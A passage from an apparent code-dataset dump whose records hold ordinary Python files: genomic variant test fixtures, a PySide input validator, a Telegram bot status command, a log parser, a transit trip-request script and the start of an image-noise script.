\"vega:OTTHUMG00000090553\",\n \"uniprot:Q6P2Q9\",\n \"ena.embl:AB007510\",\n \"omim:607300\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": 
\"previous_symbols\",\n \"value\": [\n \"RP13\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ],\n \"gene_id\": \"hgnc:17340\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_600loc():\n \"\"\"Create test fixture for BRAF 600 location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.2cHIgn7iLKk4x9z3zLkSTTFMV0e48DR4\",\n \"interval\": {\n \"end\": {\"value\": 600, \"type\": \"Number\"},\n \"start\": {\"value\": 599, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.cQvw4UsHHRRlogxbWCB8W-mKD4AraM9y\",\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_v600e(braf_gene_context, braf_600loc):\n \"\"\"Create BRAF V600E protein test fixture.\"\"\"\n params = {\n \"id\": \"normalize.variation:BRAF%20V600E\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.ZDdoQdURgO2Daj2NxLj4pcDnjiiAsfbO\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.ZDdoQdURgO2Daj2NxLj4pcDnjiiAsfbO\",\n \"location\": braf_600loc,\n \"state\": {\n \"sequence\": \"E\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001606\",\n \"vrs_ref_allele_seq\": \"V\",\n \"gene_context\": braf_gene_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef vhl_silent(vhl_gene_context):\n \"\"\"Create NP_000542.1:p.Pro61 fixture.\"\"\"\n params = {\n \"id\": \"normalize.variation:NP_000542.1%3Ap.Pro61%3D\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.S1GX6EwJV3exmJAH8MnxS8-S9J4i2Ip_\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.S1GX6EwJV3exmJAH8MnxS8-S9J4i2Ip_\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.zuNGmA02Uq49faqvCIPtwVrF_IJuP4dM\",\n \"interval\": {\n \"end\": {\"value\": 61, \"type\": \"Number\"},\n \"start\": {\"value\": 60, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.z-Oa0pZkJ6GHJHOYM7h5mY_umc0SJzTu\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"P\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001017\",\n \"vrs_ref_allele_seq\": \"P\",\n \"gene_context\": vhl_gene_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef protein_insertion(egfr_context):\n \"\"\"Create test fixture for NP protein insertion.\"\"\"\n params = {\n \"id\": \"normalize.variation:NP_005219.2%3Ap.Asp770_Asn771insGlyLeu\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.t_WLqe5efVQlBmdbIBgqIeLRu2rSJDJJ\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.t_WLqe5efVQlBmdbIBgqIeLRu2rSJDJJ\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.DJIP1jlxQIro1oC5re8txtH7N8vAvM7A\",\n \"interval\": {\n \"end\": {\"value\": 770, \"type\": \"Number\"},\n \"start\": {\"value\": 770, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.vyo55F6mA6n2LgN4cagcdRzOuh38V4mE\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"GL\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001605\",\n \"gene_context\": 
egfr_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef protein_deletion_np_range(erbb2_context):\n \"\"\"Create test fixture for protein deletion using NP accession and\n range for deletion.\n \"\"\"\n params = {\n \"id\": \"normalize.variation:NP_004439.2%3Ap.Leu755_Thr759del\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.rFwsfnekdWjwKNmsAw9fZOCGgIvcMnCn\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.rFwsfnekdWjwKNmsAw9fZOCGgIvcMnCn\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.vhpNJ0vsJx3WbnCfwJzxFU-wWyZwvPdL\",\n \"interval\": {\n \"end\": {\"value\": 759, \"type\": \"Number\"},\n \"start\": {\"value\": 754, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.AF1UFydIo02-bMplonKSfxlWY2q6ze3m\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001604\",\n \"vrs_ref_allele_seq\": \"LRENT\",\n \"gene_context\": erbb2_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_v600e_genomic_sub():\n \"\"\"Create test fixture for NC_000007.14:g.140753336A>T\"\"\"\n return {\n \"_id\": \"ga4gh:VA.fZiBjQEolbkL0AxjoTZf4SOkFy9J0ebU\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.zga82-TpYiNmBESCfvDvAz9DyvJF98I-\",\n \"interval\": {\n \"end\": {\"value\": 140753336, \"type\": \"Number\"},\n \"start\": {\"value\": 140753335, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"T\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup1_seq_loc():\n \"\"\"Create test fixture containing genomic dup1 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.G_J9WrfooiONRgjbmGPuCBYbBYFQnYOg\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 49531260, \"type\": \"Number\"},\n \"end\": {\"value\": 49531262, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup1_38_cn(genomic_dup1_seq_loc):\n \"\"\"Create test fixture for copy number count dup1 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.wIUwSQ9MQdv-2dsoDo-RjI97iK3Mn5m6\",\n \"subject\": genomic_dup1_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 3}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup2_seq_loc():\n \"\"\"Create genomic dup2 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.4mH68huylkPmu6zyUwH4wiazIYr9cQUX\",\n \"sequence_id\": \"ga4gh:SQ.yC_0RBj3fgBlvgyAuycbzdubtLxq-rE0\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 2087937, \"type\": \"Number\"},\n \"end\": {\"value\": 2087948, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup2_38_cn(genomic_dup2_seq_loc):\n \"\"\"Create test fixture for copy number count dup2 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.2ByO6IxnL3qVjpFfMBUzPHa45NW1JNJy\",\n \"subject\": genomic_dup2_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 3}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del3_dup3_loc():\n 
\"\"\"Create genomic del3 dup3 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.DgEMxYt1AdPe-HZAQbT2AVz5OejICnOj\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"min\": 31060226,\n \"max\": 31100350,\n \"type\": \"DefiniteRange\"\n },\n \"end\": {\n \"min\": 33274279,\n \"max\": 33417152,\n \"type\": \"DefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup4_loc():\n \"\"\"Create genomic dup4 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.us51izImAQQWr-Hu6Q7HQm-vYvmb-jJo\",\n \"sequence_id\": \"ga4gh:SQ.-A1QmD_MatoqxvgVxBLZTONHz9-c7nQo\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 30417575,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 31394018,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup5_loc():\n \"\"\"Create genomic dup5 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.k2FXLyqyS8pbtZxEHCpNd2SHD6iCtH9C\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 154021811,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 154092209,\n \"type\": \"Number\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup6_loc():\n \"\"\"Create genomic dup6 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.h0_xXu36uSnPEuLoxvVmTAFQCS1ZFuLN\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 154021811,\n \"type\": \"Number\"\n },\n \"end\": {\n \"value\": 154092209,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del1_seq_loc():\n \"\"\"Create genomic del1 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.Yg5B66zErDjK9Lqeaw-kuzAB9w5-uUaS\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 10149810, \"type\": \"Number\"},\n \"end\": {\"value\": 10149811, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del1_38_cn(genomic_del1_seq_loc):\n \"\"\"Create test fixture for copy number count del1 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.ms5s89_fFM9tcIzgPhs_Bvj-2m8TRZFh\",\n \"subject\": genomic_del1_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 1}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del2_seq_loc():\n \"\"\"Create genomic del2 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.lksYAhEQvP8biy_nxoOJ_Zwu75a_kYtQ\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 10146594, \"type\": \"Number\"},\n \"end\": {\"value\": 10146613, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del2_38_cn(genomic_del2_seq_loc):\n \"\"\"Create test fixture for copy number count del1 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": 
\"ga4gh:CN.sO2So0Kj3-Op_1XTRrs2vW9JQ7lcYL30\",\n \"subject\": genomic_del2_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 1}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del4_seq_loc():\n \"\"\"Create genomic del4 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.7OJ5EFgu_2C4zPFDUBgn-ziE6BZwsRcv\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 31120495,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 33339477,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del5_seq_loc():\n \"\"\"Create genomic del5 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.jURzcCBf3kJVx19uuJJtwt78LuBbtfwD\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 18575353,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 18653629,\n \"type\": \"Number\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del6_seq_loc():\n \"\"\"Create genomic del6 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.TPwsB5ymsNI7TynTlI8_8CI_NmNrBHUQ\",\n \"sequence_id\": \"ga4gh:SQ.0iKlIQk2oZLoeOG9P1riRU6hvL5Ux8TV\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 133462763,\n \"type\": \"Number\"\n },\n \"end\": {\n \"value\": 133464858,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef grch38_genomic_insertion_seq_loc():\n \"\"\"Create test fixture for GRCh38 genomic insertion seq location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.fJ80Ab9JP0GXtDNeEaoDxE35tlI-k9Cd\",\n \"interval\": {\n \"end\": {\"value\": 39724743, \"type\": \"Number\"},\n \"start\": {\"value\": 39724731, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef grch38_genomic_insertion_variation(grch38_genomic_insertion_seq_loc):\n \"\"\"Create a test fixture for NC_000017.10:g.37880993_37880994insGCTTACGTGATG\"\"\"\n return {\n \"_id\": \"ga4gh:VA.tCjV190dUsV7tSjdR8qOLSQIR7Hr8VMe\",\n \"location\": grch38_genomic_insertion_seq_loc,\n \"state\": {\n \"sequence\": \"TACGTGATGGCTTACGTGATGGCT\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_amplification(braf_ncbi_seq_loc, braf_gene_context):\n \"\"\"Create test fixture for BRAF Amplification\"\"\"\n _id = \"ga4gh:CX.TZBOQe5xFojvFJ1XjQQD0633rStHtGUs\"\n params = {\n \"id\": \"normalize.variation:BRAF%20Amplification\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": _id,\n \"variation\": {\n \"_id\": _id,\n \"subject\": braf_ncbi_seq_loc,\n \"copy_change\": \"efo:0030072\",\n \"type\": \"CopyNumberChange\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0001880\",\n \"gene_context\": braf_gene_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef prpf8_amplification(prpf8_ncbi_seq_loc, prpf8_gene_context):\n \"\"\"Create test fixture for PRPF8 Amplification\"\"\"\n _id = \"ga4gh:CX.UD9c0niZWqC5vDSkFUGkMAdwWcZOHV32\"\n params = 
{\n \"id\": \"normalize.variation:PRPF8%20AMPLIFICATION\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": _id,\n \"variation\": {\n \"_id\": _id,\n \"subject\": prpf8_ncbi_seq_loc,\n \"copy_change\": \"efo:0030072\",\n \"type\": \"CopyNumberChange\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0001880\",\n \"gene_context\": prpf8_gene_context\n }\n return VariationDescriptor(**params)\n\n\ndef assertion_checks(normalize_response, test_variation, label, ignore_id=False):\n \"\"\"Check that normalize_response and test_variation are equal.\"\"\"\n if not ignore_id:\n assert normalize_response.id == test_variation.id, \"id\"\n assert normalize_response.label == label\n assert normalize_response.type == test_variation.type, \"type\"\n assert normalize_response.variation_id == \\\n test_variation.variation_id, \"variation_id\"\n if test_variation.variation.type != \"Text\":\n if test_variation.variation.id:\n assert normalize_response.variation.id == \\\n test_variation.variation.id, \"variation._id\"\n if test_variation.variation_id:\n assert normalize_response.variation_id == \\\n normalize_response.variation.id, \"variation_id == variation.id\" # noqa: E501\n assert normalize_response.variation == \\\n test_variation.variation, \"variation\"\n else:\n if not ignore_id:\n assert normalize_response.variation.id == \\\n test_variation.variation.id\n assert normalize_response.variation.type == \\\n test_variation.variation.type\n assert normalize_response.variation.definition == \\\n test_variation.variation.definition\n assert normalize_response.molecule_context == \\\n test_variation.molecule_context, \"molecule_context\"\n assert normalize_response.structural_type == \\\n test_variation.structural_type, \"structural_type\"\n assert normalize_response.vrs_ref_allele_seq == \\\n test_variation.vrs_ref_allele_seq, \"vrs_ref_allele_seq\"\n\n resp_gene_context = normalize_response.gene_context\n test_variation_context = test_variation.gene_context\n if resp_gene_context:\n if not ignore_id:\n assert resp_gene_context.id == test_variation_context.id, \"gene_context.id\"\n assert resp_gene_context.label == \\\n test_variation_context.label, \"gene_context.label\"\n assert resp_gene_context.gene_id ==\\\n test_variation_context.gene_id, \"gene_context.gene_id\"\n assert set(resp_gene_context.xrefs) ==\\\n set(test_variation_context.xrefs), \"gene_context.xrefs\"\n if test_variation_context.alternate_labels:\n assert set(resp_gene_context.alternate_labels) == \\\n set(test_variation_context.alternate_labels), \"gene_context.alternate_labels\" # noqa: E501\n assert len(resp_gene_context.extensions) == \\\n len(test_variation_context.extensions), \"len gene_context.extensions\"\n for resp_ext in resp_gene_context.extensions:\n for test_var in test_variation_context.extensions:\n if resp_ext.name == test_var.name:\n if resp_ext.name == \"chromosome_location\":\n assert resp_ext.value == test_var.value, \\\n \"gene_context.chromosome_location\"\n elif resp_ext.name == \"associated_with\":\n assert set(resp_ext.value) == set(test_var.value), \\\n \"gene_context.associated_with\"\n else:\n if isinstance(test_var.value, list) and isinstance(test_var.value[0], str): # noqa: E501\n assert set(resp_ext.value) == set(test_var.value), \\\n f\"gene_context.{resp_ext.name}\"\n else:\n assert resp_ext.value == test_var.value,\\\n f\"gene_context.{resp_ext.name}\"\n else:\n assert not 
test_variation_context\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":44103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"255449061","text":"# ccsi_int_validator.py\nfrom PySide.QtGui import QMessageBox\n\n\nclass CCSIIntValidator(object):\n    def __init__(self, lower=1, upper=10, name=\"\"):\n        self._lower = lower\n        self._upper = upper\n        self._name = name\n        self._msgbox = False\n\n    @property\n    def lower(self):\n        return self._lower\n\n    @lower.setter\n    def lower(self, lower):\n        self._lower = lower\n\n    @property\n    def upper(self):\n        return self._upper\n\n    @upper.setter\n    def upper(self, upper):\n        self._upper = upper\n\n    @property\n    def name(self):\n        return self._name\n\n    @name.setter\n    def name(self, name):\n        self._name = name\n\n    def validate(self, text_input, parent=None):\n        if self._msgbox:\n            return False\n        if len(text_input) == 0:\n            if len(self._name):\n                msg = \"The input for {0} is empty! Please enter a number between {1} and {2}\".format(self._name, self._lower, self._upper)\n            else:\n                msg = \"The input is empty! Please enter a number between {0} and {1}\".format(self._lower, self._upper)\n            self._msgbox = True\n            QMessageBox.warning(parent, \"Warning\", msg)\n            self._msgbox = False\n            return False\n        try:\n            num = int(text_input)\n        except ValueError:\n            if len(self._name):\n                msg = \"Invalid input for {0}! Please enter a number between {1} and {2}\".format(self._name, self._lower, self._upper)\n            else:\n                msg = \"Invalid input! Please enter a number between {0} and {1}\".format(self._lower, self._upper)\n            self._msgbox = True\n            QMessageBox.warning(parent, \"Warning\", msg)\n            self._msgbox = False\n            return False\n\n        if num < self._lower:\n            if len(self._name):\n                msg = \"Invalid input for {0}! Please enter a number greater or equal to {1}\".format(self._name, self._lower)\n            else:\n                msg = \"Invalid input! Please enter a number greater or equal to {0}\".format(self._lower)\n            self._msgbox = True\n            QMessageBox.warning(parent, \"Warning\", msg)\n            self._msgbox = False\n            return False\n        elif num > self._upper:\n            if len(self._name):\n                msg = \"Invalid input for {0}! Please enter a number less or equal to {1}\".format(self._name, self._upper)\n            else:\n                msg = \"Invalid input! Please enter a number less or equal to {0}\".format(self._upper)\n            self._msgbox = True\n            QMessageBox.warning(parent, \"Warning\", msg)\n            self._msgbox = False\n            return False\n        else:\n            return True\n","sub_path":"gui/ccsi_int_validator.py","file_name":"ccsi_int_validator.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"19009135","text":"from .. import BotzHub\nfrom telethon import events, version, Button\n\n@BotzHub.on(events.NewMessage(incoming=True, pattern=\"/alive\"))\nasync def alibe(event):\n    SMEX_PIC = \"https://telegra.ph/file/4d29d5d9c99f4aee314ea.jpg\"\n    but = [[Button.url(\"Mʏ ᴍᴀsᴛᴇʀ »»\", \"t.me/HATER_GONA_HATE\")]]\n    pm_caption = \"•**I'M ALIVE AND READY TO SMEX**\\n\\n\"\n    pm_caption += \"•**Mʏ sʏsᴛᴇᴍ ɪs ᴘᴇʀғᴇᴄᴛʟʏ ʀᴜɴɴɪɴɢ**\\n\\n\"\n    pm_caption += \"• Aʙᴏᴜᴛ ᴍʏ sʏsᴛᴇᴍ ✗\\n\\n\"\n    pm_caption += \"• 𝙎𝙈𝙀𝙓 𝙓 𝙑𝙀𝙍𝙎𝙄𝙊𝙉: 1.1\\n\"\n    pm_caption += f\"• 𝙏𝙀𝙇𝙀𝙏𝙃𝙊𝙉 𝙑𝙀𝙍𝙎𝙄𝙊𝙉 ☞ {version.__version__}\\n\"\n    pm_caption += (\n        \"• 𝘾𝙊𝙋𝙔𝙍𝙄𝙂𝙃𝙏 𝘽𝙔 ☞ [╰☆☆ਪੰਡਤ ²⁰⁰²☆☆╮『🇨🇦』](t.me/HATER_GONA_HATE)\\n\\n\"\n    )\n    pm_caption += f\"• 𝘾𝙍𝙀𝘼𝙏𝙊𝙍 ☞ [╰☆☆ਪੰਡਤ ²⁰⁰²☆☆╮『🇨🇦』](t.me/HATER_GONA_HATE)\\n\"\n    await BotzHub.send_file(event.
chat_id, file=SMEX_PIC, caption=pm_caption, buttons=but, link_preview=False)\n","sub_path":"TelethonBot/plugins/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572206234","text":"\r\ndef string_parser(data, option=None):\r\n    result = []\r\n    data = data.replace(\" \", \"\")\r\n    if option is not None:\r\n        temp = data.split(\",\")\r\n        agent_a = int(temp[0][1:])\r\n        agent_b = int(temp[1])\r\n        data = str.join(\",\", temp[2:])\r\n        temp = data[1:]\r\n    else:\r\n        temp = data[2:]\r\n\r\n    temp = temp[:len(temp)-2]\r\n    for i in temp.split(\"],[\"):\r\n        temp_list = []\r\n        for j in i.split(\",\"):\r\n            temp_list.append(int(j))\r\n        result.append(temp_list)\r\n\r\n    if option is not None:\r\n        return agent_a, agent_b, result\r\n    else:\r\n        return result\r\n\r\n\r\ndef json_parser(_log_file):\r\n    json_list = {}\r\n    i = 0\r\n    while True:\r\n        temp_list = {}\r\n        line = _log_file.readline()\r\n        line = line.rstrip('\\n')\r\n\r\n        if not line:\r\n            break\r\n\r\n        line_list = line.split(\"|\")\r\n        temp_list['Time'] = line_list[0]\r\n        temp_list['Cmd'] = line_list[1]\r\n        temp_list['From'] = line_list[2]\r\n        temp_list['To'] = line_list[3]\r\n        temp_list['Msg'] = line_list[4]\r\n\r\n        json_list[i] = temp_list\r\n        i += 1\r\n\r\n    return json_list\r\n","sub_path":"Util/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519889088","text":"# transport.py\n# written by Jan-Niklas Dihlmann\n# Load xmltodict\n# python3 -m pip install xmltodict\n\nimport requests\nimport xmltodict\n\nclass Transport(object):\n\n    def __init__(self):\n        self.origin = ''\n        self.destination = ''\n\n\n    def request_stop(self, stop_name):\n        parameter = {\n            'stateless': 1,\n            'coordOutputFormat': 'NBWT',\n            'coordListOutputFormat': 'STRING',\n            'coordOutputFormatTail': 0,\n            'locationServerActiv': 1,\n            'name_sf': stop_name,\n            'type_sf': 'any',\n            'naldoSugMacro': True}\n\n        url = 'http://efa-bw.de/ios_naldo/XML_STOPFINDER_REQUEST'\n        response = requests.get(url, params=parameter)\n        response_xml = response.text\n        response_dic = xmltodict.parse(response_xml)\n        response_arr = response_dic['efa']['sf']['p']\n\n        for stop in response_arr:\n            print(stop['n'], stop['ty'], stop['r']['stateless'])\n\n\n    def request_trip(self):\n        parameter = {\n            'stateless': 1,\n            'coordOutputFormat': 'NBWT',\n            'coordListOutputFormat': 'STRING',\n            'coordOutputFormatTail': 0,\n            'locationServerActive': 1,\n            'imparedOptionsActive': 1,\n            'itOptionsActive': 1,\n            'changeSpeed': 'normal',\n            'trITMOTvalue100': 10,\n            'useProxFootSearch': 1,\n            'ptOptionsActive': 1,\n            'routeType': 'LEASTTIME', # Change Time ??\n            'lineRestriction': 400,\n            'useRealtime': 1, # Change Time ??\n            'calcNumberOfTrips': 4, # Trip Count \n            'name_origin': self.origin,\n            'type_origin': 'any',\n            'name_destination': self.destination,\n            'type_destination': 'any'\n        }\n\n        url = 'http://efa-bw.de/ios_naldo/XML_TRIP_REQUEST2'\n        response = requests.get(url, params=parameter)\n        response_xml = response.text\n        response_dic = xmltodict.parse(response_xml)\n        response_arr = response_dic['efa']['ts']['tp']\n        #print(response_arr)\n        for trip in response_arr:\n            print('----------------------------------')\n            #print(trip)\n            #print(trip['ls'][''])\n            for trip_stop in trip['ls']['l']:\n                trip_stop_point = trip_stop['ps']['p']\n                #print(trip_stop_point[1]['dt']['t'])\n
\n            print(trip_stop_point[0]['dt']['t'], trip_stop_point[0]['n'], 'Linie: ' + str(trip_stop['m']['nu']), trip_stop_point[1]['dt']['t'], trip_stop_point[1]['n'])\n            #print(response_arr)\n\n\n\ntransport = Transport()\ntransport.origin = '8010054' # Schwärzlocherstr. 111\ntransport.destination = '8010212' # BG Unfallklinik\ntransport.request_trip()\n","sub_path":"classes/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377954619","text":"import argparse\nimport string\nimport random\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport os\n\n#logo = [\"mark_rewrite__Lucky_M.png\", \"mark_rewrite_aoi_bhinn.png\", \"mark_rewrite_BadTaste.png\", \"mark_rewrite_GO_Hank.png\", \"mark_rewrite_mamnunticha.png\"]\n#logo = [\"mark_rewrite__Lucky_M.png\"]\nnum_logo = 0\nfor r, dirs, files in os.walk('./dataset/mark_logo_ran_new'):\n    # Get all the images\n    for file in files:\n        num_logo += 1\n\n\ndef get_noise_model(noise_type=\"gaussian,0,50\"):\n    tokens = noise_type.split(sep=\",\")\n\n    if tokens[0] == \"gaussian\":\n        min_stddev = int(tokens[1])\n        max_stddev = int(tokens[2])\n\n        def gaussian_noise(img):\n            noise_img = img.astype(float)\n            stddev = np.random.uniform(min_stddev, max_stddev)\n            noise = np.random.randn(*img.shape) * stddev\n            noise_img += noise\n            noise_img = np.clip(noise_img, 0, 255).astype(np.uint8)\n            return noise_img\n        return gaussian_noise\n    elif tokens[0] 